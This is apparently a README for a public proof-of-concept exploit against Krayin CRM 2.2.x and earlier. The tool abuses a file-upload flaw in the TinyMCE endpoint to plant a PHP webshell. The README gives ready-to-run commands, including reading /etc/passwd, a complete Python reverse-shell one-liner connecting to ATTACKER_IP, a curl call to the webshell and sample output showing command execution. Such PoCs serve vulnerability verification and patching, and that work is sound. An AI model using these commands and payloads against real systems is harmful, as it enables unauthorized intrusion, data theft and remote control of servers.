
Automated exploit for Krayin CRM ≤ 2.2.x.
Automated exploit for Krayin CRM ≤ 2.2.x. This script exploits an unrestricted file upload vulnerability in the TinyMCE endpoint (/admin/tinymce/upload), bypasses MIME-type validation by spoofing image/jpeg, uploads a PHP webshell, and executes arbitrary commands with web server privileges.
| Property | Value |
|---|---|
| CVE ID | CVE-2026-38526 |
| Affected Software | Krayin CRM ≤ 2.2.x |
| Vulnerability Type | Unrestricted File Upload → Remote Code Execution |
| Authentication | Required (any valid admin account) |
| Endpoint | POST /admin/tinymce/upload |
requests librarygit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
| Flag | Description | Example |
|---|---|---|
-i | Target URL (with or without http://) | http://target.com or target.com |
-u | Admin email/username | [email protected] |
-p | Admin password | AdminPassword123! |
-c | Command to execute (default: id) | whoami |
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload with spoofed MIME type[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Authentication Failed: Verify credentials are correct and the account exists on the target.
CSRF Token Extraction Failed: Ensure the target is running vulnerable Krayin CRM and the login endpoint is accessible.
Reverse Shell Not Connecting: Ensure your listener is running (nc -lvnp <PORT>), firewall rules allow outbound connections, and the IP/port in the payload are correct.
This tool is provided strictly for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Users are solely responsible for ensuring they have proper authorization before testing any target system. The author assumes no liability for misuse or damage caused by this tool.
b0nyo - PoC Implementation
TREXNEGRO - Vulnerability Discovery